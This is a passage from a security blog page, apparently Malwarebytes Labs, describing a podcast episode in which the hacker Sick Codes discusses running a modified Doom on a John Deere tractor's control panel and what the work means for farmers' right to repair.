One general piece of advice is to be extra vigilant about “new device added” notifications from any provider. This could be a warning signal that a threat actor is trying to intercept 2FA messages or OTPs that are intended for you.

Playing Doom on a John Deere tractor with Sick Codes: Lock and Code S03E18

In 1993, the video game developers at id Software released Doom, a first-person shooter that placed a nameless protagonist into the fiery depths of hell, equipped with an arsenal of weapons to mow down imps, demons, lost souls, and the intimidating “Barons of Hell.” 

In 2022, the hacker Sick Codes installed a modified version of Doom on the smart control panel of a John Deere tractor, with the video game’s nameless protagonist this time mowing down something entirely more apt for the situation: Corn.

At DEFCON 30, Sick Codes presented his work to an audience of onlookers at the conference’s main stage. His efforts to run the modified version of Doom, which are discussed in today’s episode of Lock and Code with host David Ruiz, are not just good for a laugh, though. For one specific community, the work represents a possible, important step forward in their own fight—the fight for the “right to repair.” 

“Right to Repair” enthusiasts want to be able to easily repair the things they own. It sounds like a simple ask, but when’s the last time you repaired your own iPhone? When’s the last time you were even able to replace the battery yourself on your smartphone?

The right to repair your equipment, without intervention from an authorized dealer, is hugely important to some farmers. If their tractor breaks down because of a software issue, they don’t want to wait around for someone to have to physically visit their site to fix it. They want to be able to fix it then and there and get on with their work.

So, when a hacker shows off that he was able to do something that wasn’t thought possible on a device that can be notoriously difficult to self-repair, it garners attention.  

Today, we speak with Sick Codes about his most recent work on a John Deere tractor, and how it follows up on what he and a group of researchers showed last year, when he revealed how he was able to glean an enormous amount of information about John Deere smart tractor owners from John Deere's data operations center. This time around, as Sick Codes explained, the work was less about tinkering on a laptop and more about getting physical with a few control panels that he found online.

“It’s kind of like surgery but for metallic objects, if that makes sense. Non-organic material.”

Tune in today to listen to Sick Codes discuss his work, why he did what he did, and how John Deere has reacted to his research. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

A week in security (August 22 – August 28)

Last week on Malwarebytes Labs:

Stay safe!